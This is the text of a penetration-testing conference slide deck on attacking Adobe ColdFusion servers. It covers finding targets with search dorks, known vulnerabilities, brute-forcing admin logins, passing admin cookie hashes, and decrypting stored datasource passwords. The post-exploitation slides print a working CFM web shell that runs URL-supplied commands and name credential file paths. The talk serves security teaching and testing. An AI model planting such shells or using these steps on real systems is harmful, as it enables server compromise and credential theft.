Download - ColdFusion for Pentesters
![Page 1: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/1.jpg)
ColdFusion for Pentesters
Chris Gates Carnal0wnage Lares Consulting
![Page 2: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/2.jpg)
• Chris Gates (CG) – Twitter carnal0wnage
– Blog carnal0wnage.attackresearch.com
– Job Partner/Principal Security Consultant at Lares
– Affiliations Co-Founder NoVAHackers, wXf, Attack Research, Metasploit Project
• Previous Talks – From LOW to PWNED
– Attacking Oracle (via web)
– wXf Web eXploitation Framework
– Open Source Information Gathering
– Attacking Oracle (via TNS)
– Client-Side Attacks
Whoami
![Page 3: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/3.jpg)
• What is ColdFusion
• Who uses ColdFusion
• Finding sites running ColdFusion
• Attacking ColdFusion – Common vulnerabilities
– Insta-Shell
– Gotta work for it
– Other Stuff
• Post Exploitation
• Defense?
Agenda
![Page 4: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/4.jpg)
• Kept running into ColdFusion on pentests
• Last “pentester” talk on ColdFusion was 2006 at EUSec – http://eusecwest.com/esw06/esw06-davis.pdf
• Chris Eng’s “Deconstructing ColdFusion” renewed my interest – https://media.blackhat.com/bh-us-
10/whitepapers/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-wp.pdf
– https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-slides.pdf
• People in the ColdFusion world take a high level view of security and didn’t want to give up the details on f**king ColdFusion up…had to figure it out myself
Why This Talk?
![Page 5: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/5.jpg)
• CFML = ColdFusion Markup Language
• ColdFusion = Adobe’s product that handles CFML page/libs – Runs on Windows, Solaris, HP/UX and Linux
– Apache, IIS, Jrun
• Not the only product that can handle CFML
• Railo, Mura CMS, Open Blue Dragon support CFML
What Is ColdFusion?
![Page 6: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/6.jpg)
http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf-evangelist-kit.pdf
Who Uses ColdFusion?
![Page 7: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/7.jpg)
http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf-evangelist-kit.pdf
Who Uses ColdFusion?
![Page 8: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/8.jpg)
Who Uses ColdFusion?
http://www.bricecheddarn.com/blog/post.cfm/universities-love-using-coldfusion
![Page 9: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/9.jpg)
http://www.getmura.com/index.cfm/overview/who-uses-mura/
Who Uses ColdFusion [MURA CMS]?
![Page 10: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/10.jpg)
• inurl:/index.cfm
Finding Sites Running ColdFusion
![Page 11: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/11.jpg)
• Who doesn’t love Google Dorks…
• filetype:cfm "cfapplication name" password
• inurl:login.cfm
• intitle:"Error Occurred" "The error occurred in" filetype:cfm
• intitle:"ColdFusion Administrator Login“
• intitle:"Index of" cfide
Finding Sites Running ColdFusion
![Page 12: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/12.jpg)
• inurl:/CFIDE/componentutils/
Finding Sites Running ColdFusion
![Page 13: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/13.jpg)
• inurl:/CFIDE/componentutils/ (Find misconfigured servers)
Finding Sites Running ColdFusion
![Page 14: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/14.jpg)
• http://www.gotcfm.com/thelist.cfm
Finding Sites Running ColdFusion
![Page 15: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/15.jpg)
• Delicious
Finding Sites Running ColdFusion
![Page 16: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/16.jpg)
• ColdFusion 5
ColdFusion Hit list
![Page 17: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/17.jpg)
• ColdFusion 6
ColdFusion Hit list
![Page 18: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/18.jpg)
• ColdFusion 7
ColdFusion Hit list
![Page 19: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/19.jpg)
• ColdFusion 8
ColdFusion Hit list
![Page 20: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/20.jpg)
• ColdFusion 9
ColdFusion Hit list
![Page 21: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/21.jpg)
• ColdFusion 10
ColdFusion Hit list
![Page 22: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/22.jpg)
• Metasploit Module to find ColdFusion URLs
ColdFusion Scanner
![Page 23: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/23.jpg)
• Metasploit Module to find ColdFusion URLs
ColdFusion Scanner
![Page 24: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/24.jpg)
• http://www.cvedetails.com/version-list/53/8739/1/Adobe-Coldfusion.html
Attacking ColdFusion
![Page 25: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/25.jpg)
• Common Vulnerabilities – Information Disclosure
– XSS
– SQL Injection
– Admin Interfaces Exposed (more later)
Attacking ColdFusion
![Page 26: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/26.jpg)
• Information Disclosure • Need to determine standard vs Enterprise
ColdFusion? * • Just request a .jsp page
– Standard versions don’t do JSP and will tell you so via 500 error && license exception
– Enterprise supports jsp and will just 404
• *useful for post exploitation
Attacking ColdFusion
![Page 27: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/27.jpg)
• Enterprise
Attacking ColdFusion
![Page 28: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/28.jpg)
• Standard
Attacking ColdFusion
![Page 29: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/29.jpg)
• Information Disclosure
Attacking ColdFusion
![Page 30: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/30.jpg)
Attacking ColdFusion
![Page 31: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/31.jpg)
Attacking ColdFusion
![Page 32: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/32.jpg)
Attacking ColdFusion
![Page 33: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/33.jpg)
Attacking ColdFusion
![Page 34: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/34.jpg)
• XSS
• Generally XSS is boring, but wait until we talk about cookies….
• ColdFusion has scriptProtect helps strip out <script> tags
• The blacklist used by scriptProtect: <\s*(object|embed|script|applet|meta)
• Chris Eng’s Deconstruction CF whitepaper goes into detail.
Attacking ColdFusion
![Page 35: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/35.jpg)
• XSS
Attacking ColdFusion
![Page 36: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/36.jpg)
• XSS
Attacking ColdFusion
![Page 37: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/37.jpg)
• SQL Injection
• If you see =somenumber go after it <cfquery name="getContent"
dataSource="myDataSource">
select title from tblJobs where
visible = 1 and id= #url.id#
</cfquery>
• Like most applications, its possible to write secure code but some people don’t.
Attacking ColdFusion
![Page 38: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/38.jpg)
• SQL Injection • http://site.com/links/apply.cfm?id=(@@version)
Attacking ColdFusion
![Page 39: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/39.jpg)
• Insta-Shell • BlazeDS/AMF External XML Entity Injection (CVE-2009-3960)
• File Upload Vulnerability in CF8 FCKeditor (APSB09-09)
• ‘locale’ Path Traversal Vulnerability detected (CVE-2010-2861, APSB10-18)
Attacking ColdFusion
![Page 40: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/40.jpg)
• Patching – ColdFusion requires manual patching, unzip in folder, overwrite a jar, etc
– Admin interface doesn’t alert you to available patches
– I’m not a CF admin, but seems easy to miss one
Attacking ColdFusion
![Page 41: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/41.jpg)
• Pro Tip
• Determining version is helpful for insta-shell exploits
• Metasploit module can tell you by admin interface, or you can just look at CFIDE/administator/
Attacking ColdFusion
![Page 42: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/42.jpg)
• Or you can check the wsdl
• /CFIDE/adminapi/base.cfc?wsdl
– Checked on 7-9
Attacking ColdFusion
![Page 43: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/43.jpg)
Attacking ColdFusion
![Page 44: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/44.jpg)
Attacking ColdFusion
![Page 45: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/45.jpg)
• BlazeDS/AMF External XML Entity Injection – Advisory pdf: http://www.security-assessment.com/files/advisories/2010-02-
22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
• Affects: – BlazeDS 3.2 and earlier versions
– LiveCycle 9.0, 8.2.1, and 8.0.1
– LiveCycle Data Services 3.0, 2.6.1, and 2.5.1
– Flex Data Services 2.0.1
– ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2
• CVE-2009-3960 / APSB10-05 • http://www.metasploit.com/modules/auxiliary/scanner/http/adobe_xml_inject
Attacking ColdFusion
![Page 46: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/46.jpg)
• BlazeDS/AMF External XML Entity Injection
• http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
Attacking ColdFusion
![Page 47: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/47.jpg)
Attacking ColdFusion
• BlazeDS/AMF External XML Entity Injection
![Page 48: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/48.jpg)
Attacking ColdFusion
• FCKeditor (apsb09-09)
• ColdFusion 8.01 enabled the ColdFusion FCKeditor connector && FCKeditor vulns == unauth fileupload
/CFIDE/scripts/ajax/FCKeditor/editor/file
manager/connectors/cfm/upload.cfm
• http://metasploit.com/modules/exploit/windows/http/coldfusion_fckeditor
![Page 49: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/49.jpg)
Attacking ColdFusion
• (related) FCKeditor (CVE 2009-2265) input sanitization issues
• FCKeditor prior to 2.6.4.1
• Can also check version with a GET request
• /CFIDE/scripts/ajax/FCKeditor/editor/dialog/fck_about.html
![Page 50: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/50.jpg)
Attacking ColdFusion
• “Locale” Directory Traversal
• Full walkthru here:
• http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
![Page 51: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/51.jpg)
Attacking ColdFusion
• http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
• TL;DR – You can pass the hash
• Modules for Metasploit and Canvas to exploit and get shell.
![Page 52: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/52.jpg)
Attacking ColdFusion
• “Locale” Directory Traversal
• Vulnerable Versions: • ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches ColdFusion MX8 8,0,1,195765 base patches ColdFusion MX8 8,0,1,195765 with Hotfix4
• ColdFusion 9? Immunity reported yes, but Adobe fixed downloadable version of 9. so maaaaaaybe if old version of 9.
![Page 53: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/53.jpg)
Attacking ColdFusion • “Locale” Directory Traversal
• ColdFusion 7 is always vuln, no patch
![Page 54: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/54.jpg)
Attacking ColdFusion
• Yeah, CF 8 too (has patch)
![Page 55: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/55.jpg)
Attacking ColdFusion
• Problem with traversal exploit, is you need to know full path.
• Manageable on Windows…
• Can be anywhere on *nix
– Cue path disclosure vulns
– Directory listings
– Misconfigured componentutils access
![Page 56: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/56.jpg)
Attacking ColdFusion
• Componentutils (Component cfcexplorer)
• Documentation for functions, includes full paths
![Page 57: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/57.jpg)
• Gotta work for it… • Brute Force RDS Access (If Enabled)
– Check if RDS is enabled
– Brute force RDS
• Brute Force Admin Interfaces – Main login page uses a salt that changes every 60 sec
– Use another login page also accepts admin password • Set’s cookie when you guess the right password
• No account lockouts
• Depending on version no username required
• No password complexity requirements
• No real logging (web server logging)
Attacking ColdFusion
![Page 58: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/58.jpg)
• RDS = Remote Development Services
• “In ColdFusion Studio/Builder/Eclipse, you can connect to and work with the files on any server that has ColdFusion Server installed by using RDS, just as if you were working with files on your own computer.”
• FTP over HTTP (essentially)
• Lots of docs, go read…
Attacking ColdFusion
![Page 59: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/59.jpg)
• RDS
Attacking ColdFusion
![Page 60: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/60.jpg)
• RDS
Attacking ColdFusion
![Page 61: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/61.jpg)
• RDS
Attacking ColdFusion
![Page 62: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/62.jpg)
• Admin Interfaces
• Prior to CF8 only password auth, CF 8 introduces usernames
• Easy to tell if just “admin” or other usernames
Attacking ColdFusion
![Page 63: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/63.jpg)
Attacking ColdFusion
![Page 64: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/64.jpg)
Attacking ColdFusion
![Page 65: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/65.jpg)
• Admin Interfaces
• /CFIDE/administrator/index.cfm salts the password
Attacking ColdFusion
![Page 66: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/66.jpg)
• Lots of other pages don’t
• Ex. /CFIDE/componentutils/login.cfm
Attacking ColdFusion
![Page 67: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/67.jpg)
• Get the password right, CF sets a cookie
Attacking ColdFusion
![Page 68: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/68.jpg)
• Metasploit Module
• Can do this easily in Burp Suite as well
Attacking ColdFusion
![Page 69: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/69.jpg)
Your passwords suck
![Page 70: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/70.jpg)
• Other Stuff
• Solr
• Interacting with CFC’s
• Cookies
Attacking ColdFusion
![Page 71: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/71.jpg)
• Solr APSB10-04 (Information Disclosure)
– “Vulnerability in Solr could allow access to collections created by the Solr Service to be accessed from any external machine using a specific URL”
• http://IP:8983/solr/data_medialibrary/admin/get-properties.jsp
• http://IP:8983/solr/core0/admin/get-properties.jsp
Attacking ColdFusion
![Page 72: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/72.jpg)
• Solr APSB10-04 (Information Disclosure)
Attacking ColdFusion
![Page 73: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/73.jpg)
• Interacting with CFC’s http://example.com/foo.cfc?method=mymethod&a
rga=val1&argb=val2
• This URL will invoke method mymethod on an anonymous instance of component foo.cfc, with arguments arga=“val1” and argb=“val2”
ex: /CFIDE/adminapi/administrator.cfc?method=getSalt
• Can only invoke “remote” ones over web browser
• Default stuff not sexy, custom stuff might have fun stuff.
Attacking ColdFusion
![Page 74: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/74.jpg)
• Cookies
• Normally that XSS pop up with the session cookie is pretty lame.
• “Supposed” to have a limited lifespan.
• BUT cfadmin cookie and cfutils cookie are different.
• Let’s see…
Attacking ColdFusion
![Page 75: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/75.jpg)
• Example Admin Cookie: CFAUTHORIZATION_cfadmin=YWRtaW4NRTM4QUQyMTQ5NDNEQUFEMUQ2NEMxMDJGQUVDMjlERTRBRkU5REEzRA1jZmFkbWlu
• Base64Decodes to: – admin – E38AD214943DAAD1D64C102FAEC29DE4AFE9DA3D
– cfadmin
• e38ad214943daad1d64c102faec29de4afe9da3d(sha1)=password1 WTF!!!
Attacking ColdFusion
![Page 76: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/76.jpg)
![Page 77: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/77.jpg)
• To Recap…
• Got the cfadmin cookie
• No randomness at all in the cookie
• SSL not enabled by default on admin interface
• Cookie base64 decodes to the sha1 hash of the user,
• Shown we don’t actually need to crack the hash, can just pass it
• Bad?
Attacking ColdFusion
![Page 78: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/78.jpg)
• CFAUTHORIZATION_componentutils=cGFzc3dvcmQxDXBhc3N3b3JkMQ1jb21wb25lbnR1dGlscw==
• Base64Decodes to:
– password1
– password1
– componentutils
• OMGWTFBBQ!!!
Attacking ColdFusion
![Page 79: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/79.jpg)
• But real world?
Attacking ColdFusion
![Page 80: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/80.jpg)
• But real world?
Attacking ColdFusion
![Page 81: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/81.jpg)
• From 2009 to 2012…
Attacking ColdFusion
![Page 82: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/82.jpg)
• ColdFusion Privilege Level
• Scheduling tasks
• Executing code
• Decrypting database credentials
• CFM Shells
Post Exploitation
![Page 83: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/83.jpg)
• ColdFusion (by default) runs as SYSTEM on Windows and NOBODY ON *nix
• Obviously, CF on Windows is what you want
• Sites that run other languages that haven't unmapped the ColdFusion variables are awesome too
Post Exploitation
![Page 84: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/84.jpg)
• Scheduling Tasks
• Once you have access to admin interface you can schedule a task to download code/executables/ bat files/etc
Post Exploitation
![Page 85: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/85.jpg)
Post Exploitation
![Page 86: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/86.jpg)
• Executing code
• Once you have code/exe on box you can create a system probe (that we want to fail) to make the code execute
• Or if you put cfm/jsp shell on the box, you’re done
Post Exploitation
![Page 87: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/87.jpg)
Post Exploitation
![Page 88: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/88.jpg)
Post Exploitation
![Page 89: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/89.jpg)
Post Exploitation
![Page 90: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/90.jpg)
• Decrypting database credentials
• http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html
Post Exploitation
![Page 91: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/91.jpg)
• Go to DataSource Selection
Post Exploitation
![Page 92: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/92.jpg)
• Click on DataSource (ex TEST)
Post Exploitation
![Page 93: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/93.jpg)
• View Source, get value
Post Exploitation
![Page 94: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/94.jpg)
• Decrypt it
$ python coldfusiondecrypt.py
maJsuHYMay8zpmptC2yibA==
Coldfusion v7 y v8 DataSource password decryptor (c) 2008
Hernan Ochoa ([email protected])
decrypted password: ThisIsAPassword
Post Exploitation
![Page 95: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/95.jpg)
• If you have file system access, just grab the XML files
• Coldfusion 7: \lib\neo-query.xml for example: c:\CFusionMX7\lib\neo-query.xml • Coldfusion 8: \lib\neo-datasource.xml for example: c:\coldfusion8\lib\neo-datasource.xml • Coldfusion 9: \lib\neo-datasource.xml for example: c:\coldfusion9\lib\neo-datasource.xml
Post Exploitation
![Page 96: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/96.jpg)
• CFM Shells
• ColdFusion has several handy CFML tags: – CFEXECUTE
– CFREGISTRY
– CFFILE
– CFHTTP
Simple CFM Shell:
<html>
<body>
<cfexecute name = "#URL.runme#" arguments =
"#URL.args#" timeout = "20">
</cfexecute>
</body>
</html>
Post Exploitation
![Page 97: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/97.jpg)
• CFM Shells
• Its common to disable CFEXECUTE*
• CF also runs java so: <cfset runtime = createObject("java",
"java.lang.System")>
<cfset props = runtime.getProperties()>
<cfdump var="#props#">
<cfset env = runtime.getenv()>
<cfdump var="#env#">
• Will give you something like…
Post Exploitation
![Page 98: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/98.jpg)
Post Exploitation
![Page 99: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/99.jpg)
• CFM Shells
• Remember Enterprise vs Standard?
– Enterprise runs jsp, so some jsp shells will work too (depends on the shell’s java version requirements)
Post Exploitation
![Page 100: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/100.jpg)
• CFM Shells
• Sky’s the limit!
• Pretty much anything you can code in Java, CF will run for you
• ColdFusion 9 and above support cfscript == javascript for ColdFusion
Post Exploitation
![Page 101: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/101.jpg)
• http://www.petefreitag.com/ lots of defense/CF hardening info
• http://www.bennadel.com/blog/
• http://www.raymondcamden.com/ http://12robots.com/
• Chris Eng’s Deconstructing ColdFusion (slides and WP) • https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-
Creighton-Deconstructing-ColdFusion-slides.pdf
• Davis’ EUSEC ColdFusion talk – http://eusecwest.com/esw06/esw06-davis.pdf
– Alt: http://www.orkspace.net/secdocs/Conferences/EuSecWest/2006/ColdFusion%20Security.pdf
ColdFusion Stuff To Read
![Page 102: ColdFusion for Pentesters](https://reader031.vdocument.in/reader031/viewer/2022021422/58970cfd1a28abf35c8bee3f/html5/thumbnails/102.jpg)
Questions?
@carnal0wnage
cgates [] laresconsulting[] com
Chris Gates